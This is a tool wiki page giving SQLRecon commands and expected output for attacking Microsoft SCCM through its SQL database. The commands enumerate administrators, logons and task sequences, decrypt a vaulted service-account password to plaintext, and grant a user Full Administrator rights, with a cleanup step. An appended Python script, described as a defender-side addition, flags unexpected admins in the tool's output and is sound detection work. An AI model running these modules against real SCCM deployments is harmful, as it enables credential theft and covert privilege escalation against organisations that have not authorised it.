
7. SCCM Modules

Sanjiv Kawa edited this page Jul 2, 2024 · 1 revision

SCCM modules are effective when you are able to interact with an SCCM server that exposes its Microsoft SQL database, either locally or remotely.

SCCM modules support impersonation (the `/i:` flag), with the exception of DecryptCredentials. An example has been provided in the "Users" section below.

Users

SQLRecon.exe /auth:WinToken /i:sa /host:MECM01 /database:CM_KAW /module:users

Expected output:

[*] High-Level SCCM User Listing:

| LogonName             | AdminID  | SourceSite | DistinguishedName                             |
| --------------------- | -------- | ---------- | --------------------------------------------- |
| KAWALABS\mssccm_svc   | 16777217 | KAW        |                                               |
| KAWALABS\SCCM Support | 16777218 | KAW        | CN=SCCM Support,CN=Users,DC=kawalabs,DC=local |
| KAWALABS\JSmith       | 16777229 | KAW        |                                               |
| KAWALABS\ACon         | 16777230 | KAW        |                                               |


[*] Detailed Permissions:

| LogonName             | RoleName                |
| --------------------- | ----------------------- |
| KAWALABS\mssccm_svc   | Full Administrator      |
| KAWALABS\SCCM Support | Read-only Analyst       |
| KAWALABS\SCCM Support | Remote Tools Operator   |
| KAWALABS\SCCM Support | Software Update Manager |
| KAWALABS\JSmith       | Full Administrator      |
| KAWALABS\ACon         | Full Administrator      |

Sites

SQLRecon.exe /auth:WinToken /host:MECM01 /database:CM_KAW /module:sites

Expected output:

| ServerName            | SiteCode | AccessType | ADSiteName              | IPSubnets   | IsProtected | IPv6Prefixes | ServerRemoteName      | IsDP | IsSMP |
| --------------------- | -------- | ---------- | ----------------------- | ----------- | ----------- | ------------ | --------------------- | ---- | ----- |
| MECM01.KAWALABS.LOCAL | KAW      | 0          | Default-First-Site-Name | 172.16.10.0 | 0           |              | MECM01.kawalabs.local | True | False |

Logons

SQLRecon.exe /auth:WinToken /host:MECM01 /database:CM_KAW /module:logons

Expected output:

| IP_Addr       | Host            | User            |
| ------------- | --------------- | --------------- |
| 172.16.10.110 | DESKTOP-LF8Q3C6 | KAWALABS\jsmith |
| 172.16.10.103 | MECM01          | KAWALABS\jsmith |
| 172.16.10.102 | SQL02           | KAWALABS\admin  |

TaskList

SQLRecon.exe /auth:WinToken /host:MECM01 /database:CM_KAW /module:tasklist

Expected output:

| PkgID    | Name                     |
| -------- | ------------------------ |
| KAW00005 | Install CrowdStrike      |
| KAW00006 | Install Cisco Anyconnect |
| KAW00007 | Install MFA Soft Token   |

TaskData

SQLRecon.exe /auth:WinToken /host:MECM01 /database:CM_KAW /module:taskdata

Expected output:

[*] Gathered encrypted task sequence blob.
 |-> Task Sequence ID: KAW00005
 |-> Task Sequence Name: Install CrowdStrike
 |-> Attempting to decrypt task data:

<sequence version="3.10"/>
 
[*] Gathered encrypted task sequence blob.
 |-> Task Sequence ID: KAW00006
 |-> Task Sequence Name: Install Cisco Anyconnect
 |-> Attempting to decrypt task data:

<sequence version="3.10"/>
 
[*] Gathered encrypted task sequence blob.
 |-> Task Sequence ID: KAW00007
 |-> Task Sequence Name: Install MFA Soft Token
 |-> Attempting to decrypt task data:

<sequence version="3.10"/>

Credentials

SQLRecon.exe /auth:WinToken /host:MECM01 /database:CM_KAW /module:credentials

Expected output:

| UserName            | Usage                                                                           |
| ------------------- | ------------------------------------------------------------------------------- |
| KAWALABS\mssccm_svc | <AccountUsages><UsageName>SMS_CLIENT_CONFIG_MANAGER</UsageName></AccountUsages> |

DecryptCredentials

SQLRecon.exe /auth:WinToken /host:MECM01 /database:CM_KAW /module:decryptcredentials

Expected output:

[*] Identified vaulted SCCM credential:
 |-> Username: KAWALABS\mssccm_svc
 |-> Password: Password123
 |-> Function: SMS_CLIENT_CONFIG_MANAGER

AddAdmin - Current User

SQLRecon.exe /auth:WinDomain /d:KAWALABS /u:admin /p:Password123 /host:MECM01 /database:CM_KAW /module:addadmin /user:current /sid:current

Expected output:

[+] SUCCESS: Added target user to RBAC_Admins table.
[*] Use the this command to remove the account: "/database:cm_kaw /module:sRemoveAdmin /user:16777223 /remove:00000000|00000000"
[+] SUCCESS: Assigned permissions to 'KAWALABS\JSmith'. The user should now be a 'Full Administrator' in SCCM.

AddAdmin - Custom User

SQLRecon.exe /auth:WinToken /host:MECM01 /database:CM_KAW /module:addadmin /user:KAWALABS\acon /sid:S-1-5-21-3113994310-608060616-2731373765-1391

Expected output:

SUCCESS: Added target user to RBAC_Admins table.
[*] Use the this command to remove the account: "/database:cm_kaw /module:sRemoveAdmin /user:16777224 /remove:00000000|00000000"
[+] SUCCESS: Asigned permissions to 'KAWALABS\acon'. The user should now be a 'Full Administrator' in SCCM.

RemoveAdmin

SQLRecon.exe /a:windomain /d:kawalabs /u:admin /p:Password123 /database:CM_KAW /m:RemoveAdmin /user:16777224 /remove:"00000000|00000000"

Expected output:

[+] SUCCESS: Removed privileges from 16777224.
[+] SUCCESS: Removed user with AdminID of '16777224' from the 'RBAC_Admins' table.
[+] SUCCESS: All cleanup actions completed.
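As an added defender-side example (not part of SQLRecon or this page): a small Python script that parses the two tables printed by the `users` module above and reports every Full Administrator that is not on an approved baseline, so a new `RBAC_Admins` entry of the kind the `addadmin` module creates stands out during review. The sample output and the baseline set are constructed from the values on this page.

```python
from typing import Dict, List, Set

# Constructed sample: the two tables the SQLRecon "users" module prints
# (values mirror the documentation page; not captured from a live site).
SAMPLE_OUTPUT = """[*] High-Level SCCM User Listing:

| LogonName             | AdminID  | SourceSite | DistinguishedName |
| --------------------- | -------- | ---------- | ----------------- |
| KAWALABS\\mssccm_svc   | 16777217 | KAW        |                   |
| KAWALABS\\SCCM Support | 16777218 | KAW        | CN=SCCM Support,CN=Users,DC=kawalabs,DC=local |
| KAWALABS\\JSmith       | 16777229 | KAW        |                   |
| KAWALABS\\ACon         | 16777230 | KAW        |                   |

[*] Detailed Permissions:

| LogonName             | RoleName                |
| --------------------- | ----------------------- |
| KAWALABS\\mssccm_svc   | Full Administrator      |
| KAWALABS\\SCCM Support | Read-only Analyst       |
| KAWALABS\\JSmith       | Full Administrator      |
| KAWALABS\\ACon         | Full Administrator      |
"""


def parse_tables(text: str) -> List[List[Dict[str, str]]]:
    """Parse every pipe-delimited table in the module output into a list of row dicts."""
    tables, header = [], None
    for line in text.splitlines():
        if not line.startswith("|"):
            header = None  # any non-table line ends the current table
            continue
        cells = [c.strip() for c in line.strip().strip("|").split("|")]
        if header is None:
            header = cells  # first table row is the header
            tables.append([])
        elif all(set(c) <= {"-"} for c in cells):
            continue  # markdown separator row
        else:
            tables[-1].append(dict(zip(header, cells)))
    return tables


def unexpected_admins(text: str, baseline: Set[str], role: str = "Full Administrator") -> List[str]:
    """Return logon names holding `role` that are not in the approved baseline."""
    perms = next(t for t in parse_tables(text) if t and "RoleName" in t[0])
    holders = {row["LogonName"] for row in perms if row["RoleName"] == role}
    return sorted(holders - baseline)


if __name__ == "__main__":
    # Assumed baseline: the service account and the support group are expected admins.
    approved = {"KAWALABS\\mssccm_svc", "KAWALABS\\SCCM Support"}
    print(unexpected_admins(SAMPLE_OUTPUT, approved))  # ['KAWALABS\\ACon', 'KAWALABS\\JSmith']
```

Run the script against a saved copy of the module output and diff the result between scheduled runs; a name that appears only after an unexpected change is the entry to investigate.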